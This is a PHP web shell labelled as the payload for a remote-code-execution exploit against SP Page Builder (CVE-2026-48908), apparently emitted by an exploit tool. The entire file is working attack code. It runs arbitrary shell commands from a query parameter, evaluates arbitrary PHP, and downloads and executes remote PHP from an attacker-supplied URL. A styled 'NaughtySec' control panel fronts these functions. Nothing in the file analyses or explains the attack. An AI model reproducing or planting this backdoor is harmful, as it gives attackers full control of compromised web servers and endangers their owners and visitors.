<?php
/**
 * CVE-2026-48908 SP Page Builder RCE Payload
 * This file is generated by the exploit tool
 */

// Check if we should load remote payload
if (isset($_GET['load'])) {{
    $url = $_GET['load'];
    if (filter_var($url, FILTER_VALIDATE_URL)) {{
        @eval("?>" . file_get_contents($url));
    }}
    exit;
}}

// Alternative: eval directly
if (isset($_GET['eval'])) {{
    @eval($_GET['eval']);
    exit;
}}

// System command execution
if (isset($_GET['cmd'])) {{
    @system($_GET['cmd']);
    exit;
}}

// PHP info for debugging
if (isset($_GET['info'])) {{
    phpinfo();
    exit;
}}

// Web shell interface
?>
<!DOCTYPE html>
<html>
<head>
    <title>Naughtysec RCE</title>
    <style>
        body {{ font-family: monospace; background: #1a1a1a; color: #00ff00; padding: 20px; }}
        input, textarea {{ background: #2a2a2a; color: #00ff00; border: 1px solid #00ff00; padding: 5px; width: 100%; }}
        .container {{ max-width: 800px; margin: 0 auto; }}
        .result {{ background: #0a0a0a; padding: 10px; margin: 10px 0; white-space: pre-wrap; }}
        .success {{ color: #00ff00; }}
        .error {{ color: #ff0000; }}
    </style>
</head>
<body>
    <div class="container">
        <h1>NaughtySec</h1>
        <p>Server: <?php echo $_SERVER['SERVER_SOFTWARE']; ?></p>
        <p>PHP: <?php echo phpversion(); ?></p>
        <hr>
        <form method="GET">
            <h3>Command Execution</h3>
            <input type="text" name="cmd" placeholder="Enter system command (e.g., id, whoami, ls)" value="<?php echo isset($_GET['cmd']) ? htmlspecialchars($_GET['cmd']) : ''; ?>">
            <button type="submit">Execute</button>
        </form>
        <?php if (isset($_GET['cmd']) && !empty($_GET['cmd'])): ?>
            <div class="result">
                <strong>Command:</strong> <?php echo htmlspecialchars($_GET['cmd']); ?><br>
                <strong>Output:</strong><br>
                <?php 
                    ob_start();
                    @system($_GET['cmd']);
                    $output = ob_get_clean();
                    echo htmlspecialchars($output);
                ?>
            </div>
        <?php endif; ?>
        <hr>
        <form method="GET">
            <h3>Load Remote Payload</h3>
            <input type="text" name="load" placeholder="Enter remote PHP URL" value="<?php echo isset($_GET['load']) ? htmlspecialchars($_GET['load']) : ''; ?>">
            <button type="submit">Load</button>
        </form>
        <hr>
        <form method="GET">
            <h3>Eval PHP Code</h3>
            <textarea name="eval" rows="5" placeholder="Enter PHP code to eval"><?php echo isset($_GET['eval']) ? htmlspecialchars($_GET['eval']) : ''; ?></textarea>
            <button type="submit">Eval</button>
        </form>
        <hr>
        <p><a href="?info=1">PHP Info</a></p>
        <p><small>Token: <?php echo isset($_GET['t']) ? htmlspecialchars($_GET['t']) : 'N/A'; ?></small></p>
    </div>
</body>
</html>
<?php
?>
